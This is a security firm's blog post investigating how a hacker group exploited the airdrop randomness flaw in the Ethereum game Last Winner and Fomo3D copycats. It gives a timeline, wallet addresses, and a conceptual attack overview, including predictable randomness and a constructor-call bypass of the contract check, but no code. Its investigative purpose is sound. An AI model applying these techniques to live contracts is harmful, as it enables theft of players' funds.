Exposing An $18 Million USD Smart Contract Vulnerability

Last Winner: Quietly Launched, Inexplicably Popular

Last Winner is a DApp game based on Ethereum which was launched on August 6th, 2018.

Unknown Sources of ETH Funding

According to Blockbeats, Last Winner is promoted and operated by Ant Colony Communication, a run-of-the-mill Ponzi scheme organization. Ant Colony has a large number of active members and influential promotional abilities [1]. Something that causes any industry veteran to immediately pause.

Looking At Promotion And Contract Code

Promotional articles for Last Winner games can be found in major online forums, media, and WeChat groups. These articles all have similar descriptions and are accompanied by promotional invitation codes. However, there is very little information in English about Last Winner.

DApp Game Airdrop Vulnerabilities

The Fomo3D game participants purchase “keys” to play. In addition to the large grand prize for the last purchaser, the participants usually have the opportunity to win an airdrop award.

  • Starting a transaction on a contract address with 0.1 Ethereum
  • Many trading statuses are failures
  • Successful transactions invoking many internal transactions
  • Complicated internal transaction call logic, accompanied by the creation and self-destruction of a large number of contracts

AnChain.AI Anomaly Detection

The suspected address with the largest footprint piqued our interest: 0xae58

Analyzing Attack Profitability

The most profitable attack is the team headed by the 0x820d address. They have accumulated more than 5,000 Ethereum (ETH). We have coined this team BAPT-LW20 (Blockchain APT — Last Winner).

The Story Behind BAPT-LW20

We chased this BAPT-LW20 hacker group and successfully recovered the BAPT hacking timeline.

BAPT-LW20 Steals The Game’s Grand Prize

On the morning of August 17th, the first round of the Last Winner game ended. The Grand Prize was won by the address 0x5167, and the total amount of the prize was 7,754 Ethereum.

Who Is Behind BAPT-LW?

The 0x20C9 address was the first to successfully exploit the original Fomo3D airdrop vulnerability and receive rewards.

0x20C9 created the attack contract 0xe7ce at 10:07 on July 8th. In the next ten minutes, it was called three times, and finally won the reward on the fourth time, investing 0.1 Ethereum and recovering 0.19 (see below).

Why Is Last Winner So Attractive?

Shortly after the initial Fomo3D was launched, the airdrop vulnerability was discovered and successfully exploited. With the widespread spread of the game and the vulnerabilities being gradually revealed, the attack methods of airdrop vulnerabilities have grown more sophisticated and enhanced throughout.

Last Winner = Hackers’ ATM!

The first round of admission to the Last Winner game amassed over 100,000 ETH. This leaves over 10,000 ETH continuously exposed to the airdrop vulnerability.

Who Is next?

On August 14th, the BAPT-LW20 hacker team’s 0x820d deployed two new versions of the attack contract again targeting another recently deployed DApp smart contract.

Timeline of BAPT-LW20:

  • 2018/07/06 Fomo3D game contract online
  • 2018/07/08 One developer from FOMO3D’s competitor discovers and exploits airdrop vulnerabilities
  • 2018/07/20 Fomo3D game growing very popular in China
  • 2018/07/20 BAPT-LW20 Hacker team activates
  • 2018/07/21 BAPT-LW20 Team Successfully Utilizes Fomo3D Airdrop Vulnerability for the First Time
  • 2018/07/23 BAPT-LW20 Team Attacks copycat game Mouse RatScam
  • 2018/07/23 Péter breaks the Fomo3D airdrop vulnerability in Reddit
  • 2018/07/24 BAPT-LW20 Hacking team attacking FoMoGame
  • 2018/07/26 BAPT-LW20 Hacker team deploys new version of attack contract 0x5483
  • 2018/08/06 Last Winner game goes online
  • 2018/08/07 Last Winner game grows more popular
  • 2018/08/07 BAPT-LW20 Hacker team starts attacking Last Winner
  • 2018/08/09 Ethereum’s unconfirmed transaction volume hit a new high in the year
  • 2018/08/10 BAPT-LW20 The hacker team transfers funds from the old contract and continues the attack with the new version of the contract
  • 2018/08/14 BAPT-LW20 The hacker team deploys a new version of the attack contract and starts attacking a new contract
  • 2018/08/17 BAPT-LW20 Hacking team wins Last Winner Grand Prize Award of 7,754 ETH

Technical Overview

The root cause of the Last Winner (Fomo3D-copycat) airdrop vulnerability is that it is difficult to generate unpredictable random numbers in Ethereum Smart Contracts.

  • The random source used by the airdrop game to control the probability of winning can be obtained in advance
  • Whether the user can get the airdrop reward and the bonus can be calculated in advance in another contract to determine the subsequent manipulation logic.
  • The Fomo3D airdrop mechanism is made to allow only non-contracted addresses (ordinary humans). However, there is a loophole in judging it, and the restriction can be bypassed by participating in the game during the construction of the contract (ie, in the contract construction method).

Attack Variable 1 — Airdrop and Mining

We know that miners usually need to do the following calculations when mining through a PoW protocol:

  1. Increased attack success rate
  2. Reduces the number of attack contract deployments and greatly reduces the consumption of gas.

Attack Variable 2 — Probability Of Winning

As mentioned above, hackers pre-deploy 1000 agent contracts. What’s the value of this number?

Attack Variable 3 — Exploiting Bugs In Airdrop Probability Calculations

Hackers are still aiming to make profits more efficiently even after discovering the flaws exposed by Fomo3D’s airdrop rule.

About AnChain.AI

A blockchain data analytics firm providing intelligence, indicators, and investigative resources for clients to enhance their security, risk, and compliance strategies.

References

[1] Blockbeats: 80,000 transactions “sealed” the Ethereum network, just to snatch the Fomo3D award? https://mp.weixin.qq.com/s/5nrgj8sIZ0SlXebG5sWVPw

Acknowledgements

AnChain.AI would like to acknowledge Secbit Labs and Graphistry for supporting this investigation.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AnChain.AI

AnChain.AI

292 Followers

Blockchain data analytics firm providing security, risk, and compliance solutions.